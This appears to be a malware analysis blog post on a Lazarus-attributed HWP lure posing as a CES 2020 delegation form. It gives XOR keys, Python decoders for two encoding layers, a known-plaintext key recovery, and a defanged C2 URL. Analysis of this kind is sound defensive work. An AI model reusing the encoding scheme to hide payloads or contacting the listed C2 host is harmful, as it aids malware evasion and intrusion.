
Analysis

24. Lazarus's HWP (CES delegation)

Just one day after the 연애심리테스트.xls malware, believed to have been built and distributed by Lazarus, was discovered, yet another new sample was distributed. The document impersonates a CES delegation application form. Its timestamp computes to 2006-02-03 13:48:46, while the last-modified date shows as 2019-10-21 07:30:06 (UTC).

CES document properties

As in the HWP malware Lazarus built before, the EPS is organized around a variable named Y101. The EPS holds the hex values that become the payload, and they are decoded by XORing them with a specific byte sequence.

EPS hex values
XOR with the specific bytes

The XOR key is the following byte sequence:

0xF6, 0xA4, 0xE6, 0xE8, 0xF6, 0xA4, 0xE6, 0xE8, 0x7C, 0x27, 0x63, 0xA2, 0xFD, 0xD3, 0x0F, 0xD4, 0x0A, 0x0A, 0x91, 0x17

XORing with these values produces another shellcode, shown below. It starts with /Y77, and the code begins with the bytes 0x60 0xC8, which disassemble to

PUSHAD

ENTER ...

so what appears is shellcode that actually executes.

Working shellcode
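To make the first stage concrete, here is an added Python script (my own example, not code from this post or from the sample) that pulls the hex string of the /Y101 variable out of an EPS, XORs it with the repeating key as printed above, and checks that the result begins with the 60 C8 (PUSHAD; ENTER) prologue the post describes. The EPS layout assumed here, a PostScript hex string of the form /Y101 <...> def, and the sample EPS are constructed for the demo; the key list is copied from the post as printed (it repeats its first four bytes, so confirm it against the real file), and the 20-byte period is an assumption.

```python
import re

# Repeating XOR key as printed in the post. The printed list repeats its first
# four bytes, so treat the 20-byte period as an assumption and confirm it
# against the real EPS before relying on it.
PAGE_KEY = bytes([0xF6, 0xA4, 0xE6, 0xE8, 0xF6, 0xA4, 0xE6, 0xE8, 0x7C, 0x27,
                  0x63, 0xA2, 0xFD, 0xD3, 0x0F, 0xD4, 0x0A, 0x0A, 0x91, 0x17])

# Assumed layout: the payload sits in a PostScript hex string, "/Y101 <...> def".
_HEXVAR_RE = re.compile(rb"/(?P<name>Y\d+)\s*<(?P<hex>[0-9A-Fa-f\s]+)>")


def extract_hex_vars(eps):
    """Return {name: raw bytes} for every /Yxxx <hex> variable in the EPS text."""
    found = {}
    for m in _HEXVAR_RE.finditer(eps):
        # bytes.fromhex ignores the whitespace PostScript allows inside <...>
        found[m.group("name").decode()] = bytes.fromhex(m.group("hex").decode())
    return found


def xor_repeating(data, key):
    """XOR data with key, cycling the key (the first-stage scheme in the post)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_stage2(blob):
    """The decoded stage in the post starts with 60 C8: PUSHAD; ENTER."""
    return blob[:2] == b"\x60\xc8"


def decode_stage1(eps, key=PAGE_KEY, var="Y101"):
    """Locate /Y101, strip the XOR layer and return the next stage."""
    hexvars = extract_hex_vars(eps)
    if var not in hexvars:
        raise ValueError(f"no /{var} hex string found in the EPS")
    stage2 = xor_repeating(hexvars[var], key)
    if not looks_like_stage2(stage2):
        raise ValueError("decoded data does not start with PUSHAD; ENTER: wrong key?")
    return stage2


# Constructed sample: a fake next stage (PUSHAD; ENTER 0,0; NOP sled) encoded
# with PAGE_KEY and wrapped in a minimal EPS so the script runs offline.
FAKE_STAGE2 = b"\x60\xc8\x00\x00\x00" + b"\x90" * 27
SAMPLE_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n/Y101 <"
              + xor_repeating(FAKE_STAGE2, PAGE_KEY).hex().encode()
              + b"> def\n")

if __name__ == "__main__":
    print(decode_stage1(SAMPLE_EPS).hex())
```

The prologue check is the cheap sanity test a practitioner wants when the transcribed key is uncertain: if the first two decoded bytes are not 60 C8, the key (or its period) is wrong and the rest of the output is noise.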

 

But inside it, the real body is hidden once more under its own XOR encoding, and a decoding loop recovers it. As in the earlier Lazarus document, the XOR is an unusual one.

A 4-byte key (0xEA5EAD00 in this sample) acts like an IV (initialization vector): each DWORD of the encoded data is XORed with the current key, and the decoded DWORD is then added to the key (mod 2^32) to produce the key for the next DWORD.

XOR operation
IV (Initial Vector)

Honestly, doing this by hand is hard and tedious. Also, thinking it might be useful if a similar scheme shows up in later campaigns, I wrote a crude and simple script. The code is below.

import sys

# Initial 32-bit key, the "IV" seen in the decoder loop.
INIT_KEY = 0xEA5EAD00
MASK32 = 0xFFFFFFFF


def decode_body(hex_text, init_key=INIT_KEY):
    """Decode the XOR-encoded body hidden inside the shellcode.

    The original byte-by-byte loop is equivalent to this DWORD loop:
        plain = cipher ^ key
        key   = (key + plain) mod 2**32
    where every DWORD is little-endian, as the x86 decoder reads it.
    A trailing partial DWORD is XORed with the low bytes of the key.
    """
    data = bytes.fromhex(hex_text)
    key = init_key
    out = bytearray()
    for off in range(0, len(data), 4):
        chunk = data[off:off + 4]
        cipher = int.from_bytes(chunk, "little")  # a short tail is zero-padded
        plain = cipher ^ key
        out += plain.to_bytes(4, "little")[:len(chunk)]
        key = (key + plain) & MASK32  # the wrap-around the old if/elif ladder emulated
    return bytes(out)


if __name__ == "__main__":
    # The page's hex dump of the encoded body (encrypt_value) is not reproduced
    # here; pass it as the first argument or paste it into encrypt_value.
    encrypt_value = sys.argv[1] if len(sys.argv) > 1 else ""
    print(decode_body(encrypt_value).hex().upper())

 

The code is roughly as above; it prints the decoded hex values.
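As an added example (not the author's script above), the next Python block isolates the scheme the decoder implements: treat the body as little-endian DWORDs, XOR each with the current key, and add the decoded DWORD to the key mod 2^32. It goes one step beyond the post by including the matching encoder and a known-plaintext recovery of the initial key: because the key chain depends only on the plaintext, guessing the first four plaintext bytes (here the 60 C8 00 00 prologue) fixes the IV and therefore the whole body. The sample body and the hxxp placeholder URL inside it are constructed for the demo; 0xEA5EAD00 is the IV from the post.

```python
MASK32 = 0xFFFFFFFF
PAGE_IV = 0xEA5EAD00  # initial key (the "IV") shown in the post's decoder


def _dwords(data):
    """Yield (little-endian DWORD, chunk length); a short tail is zero-padded."""
    for off in range(0, len(data), 4):
        chunk = data[off:off + 4]
        yield int.from_bytes(chunk, "little"), len(chunk)


def decode_chain(cipher, iv):
    """plain = cipher ^ key; key = (key + plain) mod 2**32, per DWORD."""
    key, out = iv, bytearray()
    for c, n in _dwords(cipher):
        p = c ^ key
        out += p.to_bytes(4, "little")[:n]
        key = (key + p) & MASK32
    return bytes(out)


def encode_chain(plain, iv):
    """Inverse of decode_chain. The key chain is driven by the plaintext, so the
    encoder advances the key with the plaintext DWORD as well."""
    key, out = iv, bytearray()
    for p, n in _dwords(plain):
        out += (p ^ key).to_bytes(4, "little")[:n]
        key = (key + p) & MASK32
    return bytes(out)


def recover_iv(cipher, known_prefix):
    """Known-plaintext recovery: the first DWORD alone fixes the IV (c0 ^ p0),
    and every later key is that IV plus the running plaintext sum, which the
    decoder recomputes itself, so one good 4-byte guess unlocks the whole body."""
    if len(cipher) < 4 or len(known_prefix) < 4:
        raise ValueError("need one full DWORD of ciphertext and of known plaintext")
    c0 = int.from_bytes(cipher[:4], "little")
    p0 = int.from_bytes(known_prefix[:4], "little")
    return c0 ^ p0


# Constructed sample: the PUSHAD; ENTER 0,0 prologue plus a placeholder string,
# encoded with the post's IV so the round trip can be checked offline.
SAMPLE_BODY = b"\x60\xc8\x00\x00\x00" + b"hxxp://example.invalid/public.avi"
SAMPLE_CIPHER = encode_chain(SAMPLE_BODY, PAGE_IV)

if __name__ == "__main__":
    iv = recover_iv(SAMPLE_CIPHER, b"\x60\xc8\x00\x00")  # guess: the prologue
    print(hex(iv), decode_chain(SAMPLE_CIPHER, iv))
```

The practical point is that the scheme offers no protection once any four consecutive plaintext bytes at a known offset are guessable: a PUSHAD; ENTER prologue, an MZ header or a known API string is enough, and there is nothing to brute-force.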

 

Below are the decoded hex values. As in the AhnLab and ALYac analyses, there is a section that keeps looping a connection to kernel32.dll on localhost, apparently to hinder analysis, and the actual C2 server was identified.

Decoded body

 

C2 server

- https://thevagabondsatchel[.]com/wp-content/uploads/2019/09/public[.]avi

 

Useful references

https://asec.ahnlab.com/1256

Malicious HWP distributed with 'CES delegation application form' content

Today a new malicious HWP (Hangul) document titled '『 미국 라스베가스 CES 2020 참관단』 참가신청서' (US Las Vegas CES 2020 delegation application form) was submitted to the AhnLab ASEC analysis team. This malicious file is based on the CES application form that the Federation of Korean Information Industries recently posted online..

https://blog.alyac.co.kr/2581?category=957259

Lazarus group: APT attack impersonating the US Las Vegas CES 2020 delegation application form detected

Hello, this is the ESTsecurity Security Response Center (ESRC). Today ESRC detected signs of a cyber attack by the Lazarus group. This attack used the method of sending emails containing malicious files to specific targets and..
